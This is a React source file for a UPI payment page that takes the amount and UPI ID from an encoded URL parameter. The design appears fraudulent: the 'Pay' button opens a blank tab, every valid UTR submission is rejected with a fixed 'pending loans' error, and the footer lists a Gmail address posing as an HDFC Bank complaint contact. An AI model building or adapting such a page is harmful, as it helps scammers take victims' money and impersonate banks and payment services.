import { useEffect, useState } from 'react';
import { HiOutlineExclamationTriangle } from 'react-icons/hi2';
import WarningDialog3 from './WarningDialog3';
import {  useParams } from 'react-router-dom';

const PaymentPage = () => {
  const { id } = useParams();

  const data = JSON.parse(atob(id));

  
  const [utr, setUtr] = useState('');
  const [paymentMethod, setPaymentMethod] = useState('PhonePe');
  const [copy, setCopy] = useState('');
  const [submitError, setSubmitError] = useState('');

  const handleUTRChange = (event) => {
    const inputUtr = event.target.value;
    setUtr(inputUtr);
  };

  const handlePaymentMethodChange = (event) => {
    setPaymentMethod(event.target.value);
  };

  const handleCopy = (type, text) => {
    navigator.clipboard.writeText(text);
    setCopy(`copy ${type} ${text} success!`);
    setTimeout(() => {
      setCopy('');
    }, 3000);
  };

  const handleSubmit = (event) => {
    event.preventDefault();
    if (utr.length === 12 && paymentMethod) {
      setSubmitError(`This payment is not update due to pending loans`);
    } else {
      setSubmitError('please input 12 digit');
    }
    setTimeout(() => {
      setSubmitError('');
    }, 3000);
  };

  useEffect(() => {
    document.title = data?.ap;
  }, [data?.ap]);

  
  return (
    <div class='mainbody'>
      {copy && (
        <div className={'animate-copy'} style={{ backgroundColor: '00ff01' }}>
          {copy}
        </div>
      )}
      {submitError && (
        <div
          className={'animate-copy'}
          style={{ backgroundColor: '#ff0001' }}
        >
          {submitError}
        </div>
      )}
      <div class='section'>
        <p
          style={{
            fontSize: '0.9rem',
            color: 'rgb(85, 85, 127)',
            padding: '8px',
            margin: '2px',
            textAlign: 'left'
          }}
        >
          Amount payable
        </p>
        <div class='value'>
          <p
            style={{
              color: 'rgb(12, 69, 126)',
              fontSize: '0.9rem',
              fontWeight: 'bold'
            }}
          >
            ₹{data.a}
          </p>
          <button
            class='december-23-copy-btn'
            onClick={() => handleCopy('amount', data.a)}
          >
            copy
          </button>
        </div>
        <div class='value'>
          <span
            style={{
              color: 'rgb(85, 85, 127)',
              fontSize: '15px'
            }}
          >
            {data.up}
          </span>
          <button
            class='december-23-copy-btn'
            onClick={() => handleCopy('upi', data.up)}
          >
            copy
          </button>
        </div>
      </div>

      <div className='section payment-method-section'>
        <p
          style={{
            fontSize: '0.9rem',
            color: 'rgb(85, 85, 127)',
            padding: '8px',
            margin: '2px',
            textAlign: 'left'
          }}
        >
          Select payment method
        </p>
        <div className='radio-group'>
          <label className='radio-border'>
            <input
              type='radio'
              name='paymentMethod'
              value='PhonePe'
              onChange={handlePaymentMethodChange}
              checked={paymentMethod === 'PhonePe'}
            />
            <span>
              <img
                style={{ border: '3px', height: '25px' }}
                src='/images/phone-pe.png'
                alt='PhonePe'
                class='img2'
              />
            </span>
          </label>
          <label className='radio-border'>
            <input
              type='radio'
              name='paymentMethod'
              value='GPay'
              onChange={handlePaymentMethodChange}
              checked={paymentMethod === 'GPay'}
            />
            <span>
              <img
                style={{ height: '20px' }}
                src='/images/google-pay.png'
                alt='Google Pay'
                class='img2'
              />
            </span>
          </label>
          <label className='radio-border'>
            <input
              type='radio'
              name='paymentMethod'
              value='Paytm'
              onChange={handlePaymentMethodChange}
              checked={paymentMethod === 'Paytm'}
            />
            <span>
              <img
                style={{ height: '25px' }}
                src='/images/paytm.png'
                alt='Paytm'
                class='img2'
              />
            </span>
          </label>
          <label className='radio-border'>
            <input
              type='radio'
              name='paymentMethod'
              value='Lipi'
              onChange={handlePaymentMethodChange}
              checked={paymentMethod === 'Lipi'}
            />
            <span>
              <img
                style={{ height: '20px' }}
                src='/images/upi (1).png'
                alt='UPI'
                class='img2'
              />
            </span>
          </label>
        </div>
      </div>

      <button
        class='sbmit-btn'
        style={{
          marginTop: '1rem'
        }}
        onClick={() => window.open('about:blank', '_blank')}
      >
        Pay ₹{data.a}
      </button>

      <div
        style={{
          fontSize: '0.9rem',
          color: 'rgb(85, 85, 127)',
          padding: '8px',
          margin: '2px',
          textAlign: 'left',
          marginTop: '3px'
        }}
      >
        Input utr to finish the payment
      </div>

      <div style={{ display: 'flex', alignItems: 'flex-start' }}>
        <HiOutlineExclamationTriangle color='red' size={35} />
        <p
          style={{
            display: 'inline-block',
            float: 'left',
            fontSize: '12px',
            color: 'rgb(85, 85, 127)',
            padding: '4px',
            textAlign: 'left'
          }}
        >
          Be sure to return to this page to fill the UTR numbers after you have
          completed your payment
        </p>
      </div>

      <form onSubmit={handleSubmit}>
        <div class=' utr-input'>
          <input
            type='text'
            value={utr}
            onChange={handleUTRChange}
            placeholder='UTR (UPI Ref.ID) must be 12 digits'
            className='input-utr'
          />
          <button type='submit' class='sbmit-btn'>
            Submit UTR
          </button>
        </div>
      </form>
      <div class='footer-image'>
        <img src='/images/logo_phonepe.png' alt='PhonePe' class='img2' />
        <img src='/images/logo_googlepay.png' alt='Google Pay' class='img2' />
        <img src='/images/logo_paytm.png' alt='Paytm' class='img2' />
        <img src='/images/upi (1).png' alt='UPI' class='img2' />
      </div>
      <div class='footer'>
        <a
          style={{
            textAlign: 'center',
            fontSize: '0.7rem',
            marginTop: '1.2rem',
            color: 'royalblue'
          }}
          href='hdfcbankcomplaintacceptance@gmail.com'
        >
          hdfcbankcomplaintacceptance@gmail.com
        </a>
        <p
          style={{
            marginTop: '20px',
            left: '0rem',
            right: '0rem',
            alignItems: 'center',
            justifyContent: 'center',
            fontSize: '0.6rem',
            bottom: '0.4rem',
            color: 'rgb(136, 134, 134)'
          }}
        >
          {' '}
          Copyright 2023.All Rights Reserved
        </p>
      </div>
      <WarningDialog3 />
    </div>
  );
};

export default PaymentPage;
